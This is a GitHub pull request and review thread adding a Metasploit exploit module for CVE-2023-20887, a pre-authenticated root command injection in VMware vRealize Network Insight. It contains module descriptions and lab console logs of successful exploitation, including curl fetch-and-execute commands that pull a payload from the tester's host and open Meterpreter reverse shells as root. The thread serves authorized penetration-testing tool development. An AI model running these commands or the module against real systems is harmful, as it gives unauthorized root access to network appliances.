### PR TITLE
(Attempt 2) VMWare vRealize Network Insight pre-authenticated RCE CVE-2023-20887

### LINKED ISSUE #18092: [Module] VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE
### VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE

Hey rapid7 team,
here is the Metasploit exploit module for this issue on my GitHub repo.

https://github.com/sinsinology/CVE-2023-20887/vmware_vrni_rce_cve_2023_20887.rb

Version: 6.8.0.1666364233
Exploit By: Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
A root cause analysis of the vulnerability can be found on my blog:
https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/

All the best,
Sina

### PR DESCRIPTION
**Pull request by h00die**
fix #18092

Trying not to let #18093 die since the code looked decent and we made it through the PR pretty well.

Technical details at
https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/

Leaving as a draft until I can get back around to it and writing docs

### CODE REVIEW

**Comment by jheysel-r7** [comment]
Thanks @h00die I appreciate you throwing this back up, this was on my list of things to do this week. I have the target setup locally still and can help with testing (and writing docs if you'd like).

**Comment by h00die** [comment]
Added docs, went through review comments from before and attempted to satisfy most if not all.

**Comment by wvu** [comment]
Great seeing this effort.

File: documentation/modules/exploit/linux/http/vmware_vrni_rce_cve_2023_20887.md [hunk 1]
```diff
@@ -0,0 +1,113 @@
...
+maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the
+context of `root` on the appliance.
+VMWare 6.x version are vulnerable.
+
+This module exploits the vulnerability to upload and execute payloads gaining root privileges.
+Successfully tested against version 6.8.0.
+
+### Install
+
+
```
Comment (adfoster-r7) [inline documentation/modules/exploit/linux/http/vmware_vrni_rce_cve_2023_20887.md:17]: Will need to slot some high level steps here if possible; I think @jheysel-r7 might be able to provide this section 🤞

File: modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb [hunk 2]
```diff
@@ -0,0 +1,146 @@
...
+        'Name' => 'VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE',
+        'Description' => %q{
+          VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection
+          when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a
+          remote unauthenticated attacker to execute arbitrary commands on the underlying operating system
+          as the root user. The RPC interface is protected by a reverse proxy which can be bypassed.
+          VMware has evaluated the severity of this issue to be in the Critical severity range with a
+          maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the
+          context of 'root' on the appliance.
+          VMWare 6.x version are vulnerable.
```
Comment (adfoster-r7) [inline modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb:26]:
```suggestion
          VMWare versions 6.2 to 6.10 are vulnerable.
```

**Comment by jheysel-r7** [comment]
Testing is as expected, I think this is good to go: 
```
msf6 > use linux/http/vmware_vrni_rce_cve_2023_20887
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > set rhost 192.168.1.60
rhost => 192.168.1.60
msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > set lhost 192.168.1.69
lhost => 192.168.1.69
msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > set FETCH_SRVHOST 192.168.1.69
FETCH_SRVHOST => 192.168.1.69
msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > options
Module options (exploit/linux/http/vmware_vrni_rce_cve_2023_20887):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.1.60     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    443              yes       The target port (TCP)
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host
   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      hHTNUdqFrV       no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST       192.168.1.69     yes       Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.1.69     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Unix (In-Memory)
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > rexploit
[*] Reloading module...
[*] Started reverse TCP handler on 192.168.1.67:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.1.60:443 can be exploited.
[+] The target is vulnerable. VMWare Aria Operations for Networks (vRealize Network Insight) version 6.8.0 was found.
[*] Executing Unix (In-Memory) with curl -so ./yjUczQeXbCf http://192.168.1.67:8080/VtUnMtEdkI5A0Lv6Y2zkFw; chmod +x ./yjUczQeXbCf; ./yjUczQeXbCf &
[*] Attempting to execute shell
[*] Sending stage (3045348 bytes) to 192.168.1.60
[*] Meterpreter session 9 opened (192.168.1.67:4444 -> 192.168.1.60:52370) at 2023-07-20 14:50:13 -0400
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.1.60
OS           : Ubuntu 18.04 (Linux 5.4.0-126-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

**Comment by cdelafuente-r7** [comment]
Thanks @h00die and @jheysel-r7 for this module! Everything looks good to me. I tested against VMware vRealize Network Insight version 6.3.0.1625072760 and it works great. I'll go ahead and land it.

### Example output
- In-Memory target
```
msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > run rhosts=192.168.6.122 lhost=192.168.6.8 fetch_srvhost=192.168.6.8 verbose=true

[*] Command to run on remote host: curl -so ./HvvedPpKU http://192.168.6.8:8080/MUbUZmtesJZBaBhmgETerw; chmod +x ./HvvedPpKU; ./HvvedPpKU &
[*] Fetch Handler listening on 192.168.6.8:8080
[*] HTTP server started
[*] Adding resource /MUbUZmtesJZBaBhmgETerw
[*] Started reverse TCP handler on 192.168.6.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.6.122:443 can be exploited.
[+] The target is vulnerable. VMWare Aria Operations for Networks (vRealize Network Insight) version 6.3.0 was found.
[*] Executing Unix (In-Memory) with curl -so ./HvvedPpKU http://192.168.6.8:8080/MUbUZmtesJZBaBhmgETerw; chmod +x ./HvvedPpKU; ./HvvedPpKU &
[*] Attempting to execute shell
[*] Client 192.168.6.122 requested /MUbUZmtesJZBaBhmgETerw
[*] Sending payload to 192.168.6.122 (curl/7.58.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045348 bytes) to 192.168.6.122
[*] Meterpreter session 2 opened (192.168.6.8:4444 -> 192.168.6.122:38682) at 2023-07-25 17:04:28 +0200

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.6.122
OS           : Ubuntu 18.04 (Linux 4.15.0-143-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```

- Linux Dropper target
```
msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > set WfsDelay 30
WfsDelay => 30
msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > run rhosts=192.168.6.122 lhost=192.168.6.8 verbose=true

[*] Started reverse TCP handler on 192.168.6.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.6.122:443 can be exploited.
[+] The target is vulnerable. VMWare Aria Operations for Networks (vRealize Network Insight) version 6.3.0 was found.
[*] Executing Linux Dropper
[*] Using URL: http://192.168.6.8:8080/HmMWJzCo
[*] Generated command stager: ["curl -so /tmp/UGtoouEw http://192.168.6.8:8080/HmMWJzCo;chmod +x /tmp/UGtoouEw;/tmp/UGtoouEw;rm -f /tmp/UGtoouEw"]
[*] Attempting to execute shell
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045348 bytes) to 192.168.6.122
[*] Meterpreter session 5 opened (192.168.6.8:4444 -> 192.168.6.122:57438) at 2023-07-25 17:36:29 +0200
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.6.122
OS           : Ubuntu 18.04 (Linux 4.15.0-143-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```

**Comment by cdelafuente-r7** [comment]
# Release Notes

This adds an exploit module that leverages a pre-authenticated command injection vulnerability in VMWare Aria Operations for Networks (vRealize Network Insight). Versions from 6.2 to 6.10 are vulnerable and this has been identified as CVE-2023-20887. The module bypasses the reverse proxy that protects the access to the Apache Thrift RPC interface and executes arbitrary commands on the underlying operating system as the root user.

**Pull request merged**